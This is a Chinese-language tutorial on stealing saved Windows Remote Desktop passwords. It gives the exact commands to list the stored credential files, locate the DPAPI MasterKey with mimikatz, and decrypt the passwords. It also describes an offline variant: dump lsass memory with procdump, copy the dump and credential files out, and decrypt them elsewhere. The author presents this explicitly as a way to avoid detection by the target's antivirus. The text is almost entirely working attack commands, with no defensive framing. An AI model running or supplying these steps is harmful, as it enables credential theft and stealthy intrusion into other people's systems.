Windows RDP凭证的抓取和密码破解

Windows RDP凭证的抓取和密码破解

一、条件和破解原理

当使用远程桌面时，如果点击保存密码，Windows就通过MasterKey将我们的密码保存在本地，由于Windows还需要解密从而使用，所以这个过程是可逆，也正因为这原因，我们只要拿到MasterKey就能将密码解出来。

二、凭证的查看

1、查看mstsc的凭证

cmdkey /list

2、删除mstsc的凭证

cmdkey /delete:targetname

3、查找本地的Credentials

dir /a %userprofile%\appdata\local\microsoft\credentials\*

三、在线破解

1、使用mimikatz获取该文件的guidMasterKey值

mimikatz dpapi::cred /in:C:\Users\Administrator\appdata\local\microsoft\credentials\5CF098107895D40EC0A0FC47FB5BB7C7

2、通过guidMasterKey值找到内存中对应的MasterKey

mimikatz sekurlsa::dpapi

这里因为我是用的Server2019，好像是开启了LSA防护，所以没有成功。

3、最后打开mimikatz通过MasterKey值去解密凭据文件（这里因为上一步没有成功，我是通过离线破解出来的MasterKey放到这里来尝试，结果是成功的）

mimikatz dpapi::cred
/in:C:\Users\Administrator\appdata\local\microsoft\credentials\5CF098107895D40EC0A0FC47FB5BB7C7
/masterkey:6b6ddf293f178cb282c2906c69d92226c137cca320aa6db2043708bc2755eba6cdd8faa89ef7dd656597da5346ecbb66aa57108247555e13caac0ff09ce2e1c6

四、离线破解

由于我们不能保证我们的mimikatz是免杀状态，为了避免被对方发现，我们可以离线解密从而达到获取密码的目的其实很简单，就是把目标的文件和内存下载回来，在vps或本机上进行mimikatz解密即可。

1、下载目标内存

procdump.exe ‐accepteula ‐ma lsass.exe lsass1.dump

2、下载目标的Credentials文件

C:\Users\Administrator\AppData\Local\Microsoft\Credentials

3、用mimikatz载入dump回来的内存

Sekurlsa::minidump lsass1.dump

4、获取Credentials的GUID

dpapi::cred /in:5CF098107895D40EC0A0FC47FB5BB7C7

5、获取内存中所有的MasterKey

sekurlsa::dpapi

6、利用MasterKey解密

dpapi::cred
/in:5CF098107895D40EC0A0FC47FB5BB7C7 /masterkey:6b6ddf293f178cb282c2906c69d92226c137cca320aa6db2043708bc2755eba6cdd8faa89ef7dd656597da5346ecbb66aa57108247555e13caac0ff09ce2e1c6